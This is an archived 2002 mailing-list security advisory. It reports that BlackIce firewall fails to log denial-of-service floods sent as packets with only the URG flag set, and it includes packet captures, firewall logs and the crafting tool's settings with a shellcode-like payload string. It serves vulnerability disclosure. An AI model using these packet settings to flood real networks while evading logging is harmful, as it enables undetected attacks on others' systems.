|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Adonis.No.Spam (adonis1
videotron.ca)Date: Fri Feb 15 2002 - 10:28:50 CST
Hello
I am not sure if I already sent this last week ... Had Server problem.
Peace
.---------------.
/ NtWaK0 Advisory \
+-----------------------------------------------------------------------.
:
Affected : BlackIce 2.9 car Latest with patch :
Type : DOS attacks with URG Flag Set ARE NOT LOGGED :
Date : 14-02-2002 :
Author : NtWaK0 www.SafeHack.com :
+-----------------------------------------------------------------------.
+----------------.
Remote/Local DOS \
+------------------`----------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In Fact I do not work for no one at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ]:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ]:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ]:
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
Blackice personal firewall do not log a DOS attack if sent with URG Flag:
Set. :
To learn more about Blackice please visit: :
http://www.networkice.com/ or http://www.iss.net/ :
:
:
+---------------------------+ :
>>> Test OS Applications <<< :
+---------------------------+ :
Tested on Windows 2K with SP2 :
Blackice Server 2.9 car :
Test was done on 4 boxes :
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
I never played with Blackice before even I use often. I decide to play :
with it a bit last night and here is what I found. :
:
If you send a DOS (Denial Of Service) attack to an Blackice Server :
protected box NON of your attack will be LOGGED in blackice. :
:
PLEASE DO NOT MIX this is not an attack on blackice. But if you are :
using blackice as your ONLY IDS then you are affected. :
This mean you cannot trust Blackice Logs if you was attacked with the :
same type of attacks, because your blackice wont LOG these packets. :
(Packets sent with URG flag SET). :
:
:
:
A packet crafted with URG FLAG SET to 1 and all others FLAG set to 0 :
will pass undetected by Blackice Server version. :
:
Other type of packets will be detected but the detection results is not :
that CORRECT. In the example below I sent a 5 packets with PUSH FLAG set:
to 1 and all others to 0 this was detected by BLackice as QUESO Scan. :
That is one example for many... Just play with it and you see your self.:
:
Now the bad issue is I was able to flood my local LAN with over 10000000:
packets (URG FLAG SET) and non of these packets was captured by BICE. :
:
NOTE: During the attack BlackICE LIGHT WAS GOING NUTS... BUT ZERO attack:
in the log or in the GUI. :
:
>>> PACKET DETECTED AS QUESO SCAN BUT AT LEAST WAS LOGGED <<< :
>>> Sniff Cpature <<< :
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 78
Identifier: 11783
Flags: 0x0000
TTL: 64
Protocol: 17 (UDP)
Checksum: 0xc87b
Source IP: 192.168.1.103
Dest IP: 192.168.1.101
UDP Header
Source port: 1031
Dest port: 137
Length: 58
Checksum: 0xb7e3
Raw Data
80 b0 00 00 00 01 00 00 00 00 00 00 20 43 4b 41 ( CKA)
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 (AAAAAAAAAAAAAAAA)
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 (AAAAAAAAAAAAA !)
00 01 ( )
>>> PACKET DETECTED AS QUESO SCAN BUT AT LEAST WAS LOGGED <<< :
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 78
Identifier: 11784
Flags: 0x0000
TTL: 64
Protocol: 17 (UDP)
Checksum: 0xc87a
Source IP: 192.168.1.103
Dest IP: 192.168.1.101
UDP Header
Source port: 1031
Dest port: 137
Length: 58
Checksum: 0xb7e3
Raw Data
80 b0 00 00 00 01 00 00 00 00 00 00 20 43 4b 41 ( CKA)
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 (AAAAAAAAAAAAAAAA)
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 (AAAAAAAAAAAAA !)
00 01 ( )
:
:
>>> PACKET NOT DETECTED AT ALL BY BLACKICE <<< :
============================================== :
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 72
Identifier: 18539
Flags: 0x0000
TTL: 128
Protocol: 6 (TCP)
Checksum: 0x6e28
Source IP: 192.168.1.101
Dest IP: 192.168.1.103
TCP Header
Source port: 1
Dest port: 1
Sequence: 3158779
ack: 0
Header length: 0x50
Flags: 0x20 (URG )
Window Size: 512
Checksum: 0x27cb
Urgent Pointer: 0
Raw Data
78 39 30 78 65 62 78 30 33 78 35 64 78 65 62 78 (x90xebx03x5dxebx)
30 35 78 65 38 78 66 38 78 66 66 78 66 66 78 00 (05xe8xf8xffxffx )
:
>>> PACKET NOT DETECTED AT ALL BY BLACKICE <<< :
:
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 40
Identifier: 11785
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xc8aa
Source IP: 192.168.1.103
Dest IP: 192.168.1.101
TCP Header
Source port: 1
Dest port: 1
Sequence: 0
ack: 3158811
Header length: 0x50
Flags: 0x14 (ACK RST )
Window Size: 0
Checksum: 0xf866
Urgent Pointer: 0
Raw Data
()
:
:
>>> BLACKICE LOG <<< :
:
:
13:00:50 27 BlackICE detection stopped 0.0.0.0 0.0.0 :
13:01:56 26 BlackICE detection started 0.0.0.0 0.0.0 :
13:05:07 2000321 Queso Scan 192.168.1.101 192.168.1.103 :
13:10:07 2000321 Queso Scan 192.168.1.101 192.168.1.103 :
:
>>> NOT DETECTED ATTACK WITH URG SET IS SUPPOSED TO BE HERE <<< :
>>> NOT DETECTED ATTACK WITH URG SET IS SUPPOSED TO BE HERE <<< :
:
:
>>> TCP Settings that may help you understanding what I sent <<<
:
[TCP]
fURG=1
fACK=0
fPUSH=0
fRESET=0
fSYN=0
fFIN=0
Acknowledge=0
Sequence=0
Window=0
Offset=0
Urgent=0
Checksum=0
SpecifyTCPChecksum=0
Data=x90xebx03x5dxebx05xe8xf8xffxffx
:
[UDP]
Checksum=0
SpecifyUDPChecksum=0
Data=
:
[ICMP]
Type=0
Code=0
Checksum=0
SpecifyICMPChecksum=0
Data=
Identifier=0
Sequence=0
Message=0
:
[IP]
SourceAddress=
SourcePort=1
DestinationAddress=
DestinationPort=1
HeaderSize=20
SpecifyHeaderSize=0
Identification=0
SpecifyIdentification=0
Checksum=0
SpecifyChecksum=0
TypeService=0
FragmentationType=2
DataSize=0
Offset=0
TTL=1
:
+------------. :
The Solution \ :
+--------------`---------------------------------------------------------.
No idea. Vendor should be informed... Blackice now I guess is owned by :
ISS.Net. :
+------------------------------------------------------------------------.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]